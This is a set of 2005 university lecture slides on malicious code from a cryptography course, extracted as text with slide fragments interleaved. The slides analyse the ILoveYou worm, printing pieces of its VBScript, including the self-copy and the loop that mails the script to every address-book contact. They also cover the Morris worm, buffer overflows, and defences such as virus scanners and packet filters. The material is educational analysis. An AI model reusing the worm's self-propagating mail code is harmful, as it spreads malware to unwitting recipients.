Lecture 20: Malicious Code David Evans CS588: Cryptography
advertisement
Lecture 20:
Malicious Code
CS588: Cryptography
University of Virginia
Computer Science
David Evans
http://www.cs.virginia.edu/evans
Menu
• Examination of ILoveYou Code
• Malicious Code Taxonomy
• Malcode Defenses Overview
– Virus Scanners
21 April 2005
University of Virginia CS 588
2
LoveLetter.VBS
• This 328-line program caused ~$10B in
damage
• How much work and smarts was
required?
21 April 2005
University of Virginia CS 588
3
Smart people
would
rem barok -loveletter(vbe) <i hate go to school> convey more
interesting
rem by: spyder / ispyder@mail.com /
message.
@GRAMMERSoft Group / Manila,Philippines
Main Loop
On Error Resume Next
Smart virus writers
...
wscr.RegWrite "...Scripting Host\
don’t include their
Settings\Timeout", 0
contact information.
sub main()
...
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
...
This was smart – turn off
spreadtoemail()
scripting timeout in registry.
...
end sub
(Dumb for Microsoft.)
21 April 2005
University of Virginia CS 588
4
spreadtoemail (edited to fit)
sub spreadtoemail()
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
Smart virus writers
set male=out.CreateItem(0)
can spell “mail”.
male.Recipients.Add(malead)
male.Subject = “ILOVEYOU”
male.Body = “kindly check the attached
LOVELETTER coming from me.”
male.Attachments.Add(dirsystem&
“\LOVE-LETTER-FOR-YOU.TXT.vbs”)
male.Send
x=x+1
next
Smart virus writers
next
understand for loops.
end sub
21 April 2005
University of Virginia CS 588
5
21 April 2005
University of Virginia CS 588
6
Be Very Afraid...
• When really dumb people with no
resources write malicious programs, it
costs $10B.
• What would happen if smart people with
resources wrote a malicious program?
– Paper link: Staniford, Paxson & Weaver,
How to 0wn the Internet in Your Spare
Time (2002)
• “Warhol worm”: 15 minutes to 0wn Internet
21 April 2005
University of Virginia CS 588
7
Attacking Malicious Code
• “Malicious Code” is a bad name
– Code has no intent
– Programmer’s intent doesn’t matter, what
the code does matters
• As networks get more programmable,
accidentally harmful code will become common
• We’ll use “malcode” (mal = bad)
– Its not a great name either...
21 April 2005
University of Virginia CS 588
8
Taxonomy of Code
All Code
Harmless Code
Malcode
Created by
Malicious Author
21 April 2005
Accidental
University of Virginia CS 588
(occasionally
programs are
actually
useful, too)
9
Taxomony of Malcode
[Stallings, p. 502]
Malcode
Requires Host
Program
Trap
Doors
Logic
Bombs
Trojan
Horses
Independent
Viruses
Insiders
21 April 2005
Worms
Self-Replicating
University of Virginia CS 588
10
Worms and Viruses
• People get into stupid arguments over
whether something is a “worm” or a “virus”
– Is the Internet a host program?
• See Mark W. Eichin and Jon A. Rochlis, With
Microscope and Tweezers: An Analysis of the
Internet Virus of November 1988
• Is Outlook a host program for an email?
• Similarly, for worms/viruses/Trojans
– If the user must open it (e.g., ILoveYou) it is
self-replicating?
21 April 2005
University of Virginia CS 588
11
Trojan Horses
• Greeks and Trojans at war
– Eris (Discord), Paris, Aphroditie, Helen
• Greeks attacking Troy, bombarded city for 10
years, but couldn’t get through city walls.
• Pretended to leave, left big wooden horse as gift
• Trojans brought horse into city (had to tear down
part of wall to do this), got silly drunk celebrating
victory.
• Greeks jumped out, killed sentries, and let in
Greek army.
21 April 2005
University of Virginia CS 588
12
Modern Trojan Horses
• User runs program that looks harmless
– Program pretends to be “cool, dancing bears”, also
erases your hard drive
• Most attacks today are Trojan Horses
– ILoveYou, Melissa, recent Microsoft attack, etc.
• Rely on modern humans being as dumb as
mythical Trojans
– No matter how good your city/fire walls are,
they don’t do any good if you can’t stop
users from running random code
21 April 2005
University of Virginia CS 588
13
Differences between
Morris Worm 1988 and
Melissa/ILoveYou 1999
21 April 2005
University of Virginia CS 588
14
Vulnerabilities Exploited
• Morris Worm:
– Buffer overflow: fingerd uses gets
– sendmail debug mode
– Weak Unix passwords
• Melissa:
– Word enables macros by default, no limitations on
macro behavior
• ILoveYou:
– Dumb people will run code attached to email
• Code Red/Nimda:
– Buffer overflow in IIS
21 April 2005
University of Virginia CS 588
15
Buffer Overflows
int i;
int k;
Frame Pointer
gets (s);
Input more than 64 bits:
gets just writes down
stack
bit 65: address
of bit 66
on stack
bits 66-...:
instructions
21 April 2005
...
char s[64];
Return Address
University of Virginia CS 588
16
Preventing Buffer Overflows
• Use run-time checks on all memory references
– Safe languages (CLU, Java, Eiffel, etc.)
– Safe libraries for C (don’t use gets, strcpy, etc.)
• Obfuscation
– Randomize locations in memory
• Separate code and data segments
– Make code segment unwriteable (once application
loaded), only allow jumps in code segment
• Static analysis
– Check binary or source code
• But – about ½ of recent vulnerabilities are still
buffer overflows!
21 April 2005
University of Virginia CS 588
17
Replication Strategy
• Morris Worm
– Searched .forward files (should have used
.rhosts) to find other hosts to attack
– Used password guessing to break into
other accounts
– Used fingerd, sendmail vulnerabilites
• Melissa/ILoveYou
– Emails itself to entries in victim’s Outlook
address book
21 April 2005
University of Virginia CS 588
18
Damage
• Morris Worm
– Infected ~6000 computers (10% of Internet)
• Melissa
– Infected 1.2 Million machines in a few hours
• ILoveYou
– $10 Billion in damage
• Theorized worst case worm
– ~$50B (Nicholas Weaver and Vern Paxson, A
Worst-Case Worm, WEIS 2004)
21 April 2005
University of Virginia CS 588
19
Outcomes
• Internet Worm (Robert Morris, Jr.)
– 3 years suspended sentence (no jail time),
$10,000 fine.
– Current occupation
• Melissa (David Smith) (~$80m damages)
– Plead guilty, Dec 1999 (second successful
prosecution of virus author), link to plea
agreement on manifest
– Hired by Rutgers as Computer Technician while
awaiting sentencing
• ILoveYou ($10B damages)
– Release without penalty, no laws in Philippines
21 April 2005
University of Virginia CS 588
20
• Morris Worm
Responses
– Disconnect from network
– Disorganized, phone
• Anonymous message (probably from Robert Morris)
explaining how to disable virus was not noticed or distributed
– DARPA established CERT
• Melissa
– CERT Advisory, Eradicated quickly
• But CERT had to rebuild Web server
• ILoveYou
– Many countries have since passed laws, Europe treaty
announced last week
21 April 2005
University of Virginia CS 588
21
Malcode Defenses
1. Prevent malcode from running
2. Limit damage it can do
3. Discourage attackers
21 April 2005
University of Virginia CS 588
22
Malcode Defenses
Prevent malcode from running
Virus scanners – recognize known malcode
Firewalls – drop incoming packets
Code signing (only run code from trusted
sources)
Education – make users smarter
2.
Limit damage it can do
Sandbox (“Playpen”) – run malcode in protected
virtual machine
Reference monitors – enforce policy on
execution
Intrusion Detection, System maintenance
3.
Today
Tuesday
1.
Discourage attackers
Legal – pass laws to penalize attackers
21 April 2005
University of Virginia CS 588
23
Virus Scanners
21 April 2005
University of Virginia CS 588
24
Virus Scanners
• Compare code to a database of known
malicious code
– Smart authors create self-mutating viruses
– Smart virus scanners try to deal with this (but
usually fail)
• Reasonably useful in days of “sneaker”
net (viruses spread on floppies)
• Reasonably useless when viruses spread
as fast as email
21 April 2005
University of Virginia CS 588
25
Virus Spreading
• Read email every hour
• Everyone’s address book contains 50
people
• Infects 300M
people in
6 hours!
350000000
300000000
250000000
200000000
150000000
100000000
50000000
0
1
21 April 2005
2
University of Virginia CS 588
3
4
5
6
26
Code Red
21 April 2005
University of Virginia CS 588
27
Code Red
21 April 2005
University of Virginia CS 588
28
What Virus Scanner Peddlers Do
(2001)
http://security.norton.com/
21 April 2005
University of Virginia CS 588
29
First, it tells
you to lower
your security
settings to
allow ActiveX.
21 April 2005
University of Virginia CS 588
30
Always Click “Yes”
During the download, you might
see one or more messages
asking if it is OK to download
and run these programs. Click
Yes when these messages
appear.
21 April 2005
University of Virginia CS 588
31
21 April 2005
University of Virginia CS 588
32
What Virus Scanner Peddlers Do
(Today)
21 April 2005
University of Virginia CS 588
33
21 April 2005
University of Virginia CS 588
34
What it Should Do
• Tell people who have ActiveX turned off,
“Good Job”
• Tell people who click “OK” to run their
scanner (which accesses every byte on
their disk) without checking its certificate
that they are very vulnerable and
should get an education!
21 April 2005
University of Virginia CS 588
35
Malcode Defenses
1. Prevent malcode from running
Virus scanners – recognize known malcode
Firewalls – drop incoming packets
Code signing (only run code from trusted sources)
Education – make users smarter
2. Limit damage it can do
o
o
o
Sandbox (“Playpen”) – run malcode in protected
virtual machine
Reference monitors – enforce policy on execution
Intrusion Detection, System maintenance
3. Discourage attackers
Legal – pass laws to penalize attackers
21 April 2005
University of Virginia CS 588
36
The Best Firewall
to network
Functionality is Bad
power
21 April 2005
University of Virginia CS 588
37
Lesser Firewall
to network
firewall (p: packet) {
if (allow (p)) forward (p);
else drop (p);
}
21 April 2005
University of Virginia CS 588
38
Networks – OSI Model
Application
Presentation FTP SMTP HTTP
RealPlayer
...
Session
TCP
Transport
IP
Network
Data Link
UDP
Ethernet
FDDI
CDMA
Physical
21 April 2005
University of Virginia CS 588
Smoke
Signals
Other
39
An IP (V4) Packet
Data
Options
Destination IP Address
Source IP Address
Header Checksum
Transport Protocol (e.g., TCP)
TTL
Fragment Offset
Flags
Packet Identification
Size of Datagram
Type of Service (not used)
IP Header Length
IP Version (4)
40
University of Virginia CS 588
21 April 2005
128 160
96
80
64
48
32
16
0
A Simple Packet Filter
boolean allow (packet) {
if (match (packet.source,
“18.26.4.*”))
return false;
// No packets from Robert Morris’ machines.
else if (match (packet.source,
“149.150.209.*”))
return false; // Cheaton Hall
else
return true;
}
21 April 2005
University of Virginia CS 588
41
Typical Packet Filtering Rules
Incoming:
permit 0.0.0.0 128.143.137.19
TCP src >= 1024 dst = 25
permit 0.0.0.0 128.143.137.19
TCP src = 25 dst >= 1024
Outgoing:
permit 128.143.137.19 0.0.0.0
TCP src = 25 dst >= 1024
permit 128.143.137.19 0.0.0.0
TCP src >= 1024 dst = 25
21 April 2005
University of Virginia CS 588
42
Packet Filter Layers
Application
Presentation FTP SMTP HTTP
RealPlayer
...
Session
TCP
Transport
IP
Network
Data Link
UDP
Ethernet
FDDI
CDMA
Smoke
Signals
Other
Physical
21 April 2005
University of Virginia CS 588
43
Application-Layer Gateways
• Analyze communication at application
layer
• All communication must go through a
proxy that knows about application
• Able to detect application-level attacks
• Poor scalability, performance
• Fail-safe is annoying
21 April 2005
University of Virginia CS 588
44
Malcode on the Near Horizon
• Cell Phones
– Billions of them worldwide, becoming as complex as
computers were in 1988
– About 60% run Symbian OS
• Cabir (November 2004) – spread using Bluetooth
(short range networking) on Symbian OS (but
required user agreement)
• CommWarrior (March 2005) – spread using phone
network (multimedia messages), contact list
• Today: spread limited – only 2% of phones are
“smartphones” (this will change soon!)
21 April 2005
University of Virginia CS 588
45
Malcode Summary
• Best defense is education
• Next best defense is a good offense
– Tough legal penalties for convicted attackers
– Doesn’t work against motivated foreign
governments
• Some Technical Defenses
– Virus Scanners
– Tuesday:
• Reference Monitors, Proof-Carrying Code
• Firewalls, Intrusion Detection
21 April 2005
University of Virginia CS 588
46
Charge
• Project Presentations will be final class: Tuesday,
May 3
• Normal project expectation:
– Your team will make a presentation on May 3 (up to 15
minutes, can be as short at 5)
– You will hand in a paper report on May 3
– You will put up a web page (that could just be the same
as your paper report)
• Take home final out May 3, due May 7
– Some public-key cryptosystems questions
– Something involving hash chains
– One essay question (security analysis)
21 April 2005
University of Virginia CS 588
47
